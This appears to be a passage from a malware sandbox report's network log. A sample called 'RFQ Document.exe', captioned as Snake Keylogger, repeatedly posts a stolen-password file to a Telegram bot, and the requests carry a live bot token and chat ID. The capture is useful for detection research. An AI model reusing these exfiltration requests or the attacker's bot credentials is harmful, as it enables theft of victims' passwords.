2021-09-28 05:58:25 UTC	41	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 30 30 62 62 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c500bbdfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:26 UTC	42	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:26 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:26 UTC	42	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12606,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808706,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
260	192.168.2.4	50097	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:41 UTC	413	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f1c577ff Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:41 UTC	414	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 31 63 35 37 37 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f1c577ffContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:41 UTC	414	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:41 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:41 UTC	415	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12848,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808781,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
261	192.168.2.4	50098	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:41 UTC	415	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f1e21602 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:41 UTC	415	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 31 65 32 31 36 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f1e21602Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:41 UTC	416	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:41 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:41 UTC	416	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12849,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808781,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
262	192.168.2.4	50099	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:41 UTC	417	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f20113e6 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:41 UTC	417	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 32 30 31 31 33 65 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f20113e6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:41 UTC	417	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:41 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:41 UTC	418	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12850,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808781,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
263	192.168.2.4	50100	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:41 UTC	418	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f218e9b8 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:41 UTC	419	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 32 31 38 65 39 62 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f218e9b8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:41 UTC	419	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:41 GMT Content-Type: application/json Content-Length: 518 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:41 UTC	419	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12851,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808781,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
264	192.168.2.4	50101	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:41 UTC	420	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f23f1164 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:41 UTC	420	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 32 33 66 31 31 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f23f1164Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:42 UTC	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:42 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:42 UTC	421	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12852,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808782,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
265	192.168.2.4	50102	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:42 UTC	421	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f25e1060 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:42 UTC	422	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 32 35 65 31 30 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f25e1060Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:42 UTC	422	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:42 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:42 UTC	423	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12853,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808782,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
266	192.168.2.4	50103	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:42 UTC	423	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f27aaaf6 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:42 UTC	423	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 32 37 61 61 61 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f27aaaf6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
